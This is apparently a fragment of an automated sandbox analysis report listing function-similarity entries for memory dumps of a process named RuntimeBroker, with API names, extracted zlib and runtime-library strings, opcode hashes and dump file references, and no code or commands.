                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                                                                • Instruction ID: 3428f7d05512598468881fe2741ee47eaa2d4c718b53a391806dacc461bf8f27
                                                                                                                                                                                • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                                                                • Instruction Fuzzy Hash: 33521872A146A58BD7A59F19C898B7E7BEDFB44340F814139E65A83B90DB3CE844CF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                • Instruction ID: a21a696c6b090491c6629d0cf89f837637f4ab48af9e5dd4ea38f3ac7b0fc683
                                                                                                                                                                                • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                • Instruction Fuzzy Hash: 15311F72609A8185EB719F64E8907FDB364FB44744F844039DA4D47BA5DF38D549CB20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorFormatLast
                                                                                                                                                                                • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                • API String ID: 3971115935-1149178304
                                                                                                                                                                                • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                • Instruction ID: 4e961df43b03e01fffc5692f8d0dcd4e38debf4df37a838c4ccefed7076a9077
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D212372618A8582E731AB14F8546EAF364FB88784F804136EBCD53AA8DF7CD545CF50
                                                                                                                                                                                APIs
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B074F55
                                                                                                                                                                                  • Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C19
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C3E
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B074F44
                                                                                                                                                                                  • Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751BA
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751CB
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751DC
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3714727158-0
                                                                                                                                                                                • Opcode ID: ec3da476d7abf2ffb0f6397319154e28f094a84f5b0708b50d9998a811af1003
                                                                                                                                                                                • Instruction ID: b8c2b5f65684857ba03b04b6275a3d6c74fc9a2e05f0d884f64d1be082add1f6
                                                                                                                                                                                • Opcode Fuzzy Hash: ec3da476d7abf2ffb0f6397319154e28f094a84f5b0708b50d9998a811af1003
                                                                                                                                                                                • Instruction Fuzzy Hash: AED1A026E1864286E736BF2ADC501BDE3A1FF49B84FC48135DA0D476A6DE3CE441DB60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                • Instruction ID: b3aaac424866fe1e4481d4fbc1dcf890b6384a01501259f7aaf1401a69bdb282
                                                                                                                                                                                • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                • Instruction Fuzzy Hash: B1315E32A18B8185DB759F29E8802BEB3A4FB88754F940135EA9D43B65DF38D146CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                • Opcode ID: 537ca4dcf685df196dbb745ebf7a8e3eb288cf6b089b90446fc853c3fde494ee
                                                                                                                                                                                • Instruction ID: 6c269aeb70abeba5c8fdd8854abd405dc6f7c3fa2a5a475cc835093ee82fc2f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 537ca4dcf685df196dbb745ebf7a8e3eb288cf6b089b90446fc853c3fde494ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 34B1E861B1868241EA72AB29DC049B9E350EB44BE4FC45231EE5E47BE5EF3CE441DB10
                                                                                                                                                                                APIs
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751BA
                                                                                                                                                                                  • Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751CB
                                                                                                                                                                                  • Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751DC
                                                                                                                                                                                  • Part of subcall function 00007FF72B0748D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748EC
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1511944507-0
                                                                                                                                                                                • Opcode ID: 246ddfbbe37c4787f9720b27dc9f743496b3bb1ed6dcb5155dd6029a6c9a153e
                                                                                                                                                                                • Instruction ID: bbcbc5e145e4a8db3abb822320ad60a974f88cd161742ec1b03db7f1d512ae5e
                                                                                                                                                                                • Opcode Fuzzy Hash: 246ddfbbe37c4787f9720b27dc9f743496b3bb1ed6dcb5155dd6029a6c9a153e
                                                                                                                                                                                • Instruction Fuzzy Hash: 15514B22E1864286E732EF2AEC815BDE760FB49784FC44135EA4D436A6DF3CE541DB60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                • Instruction ID: 0aa61c38757d4473b194e0fc7a595c17f3637b4adb96f75ecb8809fc0d7c5ecc
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C11AC22B14F058AEB20DF64EC542B873A0FB09718F840E30DA2D86BB4DF3CD1A98750
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                • Instruction ID: 497f57961bd7a09ff20c75ae2d79717562673fbf54f9993de206475496c48cf2
                                                                                                                                                                                • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                • Instruction Fuzzy Hash: 8BC1D072B5828687EB359F19A84867AF791F784B84F84C134DB4A477A4DF3DE8028B40
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                • Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                                                                                                • Instruction ID: 7e96a11b528ffaf83255ba34865c1975ed001324970cf244f303d826e9d7b238
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                                                                                                • Instruction Fuzzy Hash: D1F17372A183D54BE7B6AB1DC8C8A3ABAADFF44740F855534DB4947BA0CB38E540CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                • Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                                                                                                • Instruction ID: decbad6c4b2cd955186457433cec071a094654a59d86faa3ef8cfe3229071d99
                                                                                                                                                                                • Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                                                                                                • Instruction Fuzzy Hash: A1B16D73604B898AE726DF2EC846378BBA0F744B48F158921DB5D837B4CB39E851DB14
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $
                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                • Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                                                                                                • Instruction ID: 1e8b506a43bc43779dd83fdef90e8bfe3cccd4c6310053a188dff0efe01366d1
                                                                                                                                                                                • Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                                                                                                • Instruction Fuzzy Hash: 61E1C432B0864281EB7AAF2D8950139B3A0FF4DB48F945139DE9E076B4DF39E855CB50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                • Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                                                                                                • Instruction ID: 22ac88e1601392c4e0bdad7d9dea3b5e3f57eb4de8ae3f746d4a54325d6ceb6b
                                                                                                                                                                                • Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 6591B972A182C54BE7B69B1DD8D8A3E7A9DFB44380F814139DA5A46BA0CB3CE544CF10
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                • Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                                                                                                • Instruction ID: 8e060d9ec934b91e2adcbced152979ee83022610603a917344cde912a601c824
                                                                                                                                                                                • Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                                                                                                • Instruction Fuzzy Hash: D0515822B182D646E7369F3A9C00769EB91F758B94F889379CB9847AE1CE3DD4448B10
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                • Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                                                                                                • Instruction ID: 4e1412158273883a90c4be0ddf75ada2a57809ba3704e23f5cddcd8267f652be
                                                                                                                                                                                • Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                                                                                                • Instruction Fuzzy Hash: 93A14962B087C986EB32DF2EA8007ADBB91EB58784F448136DE4D477A5DE3DD501CB11
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
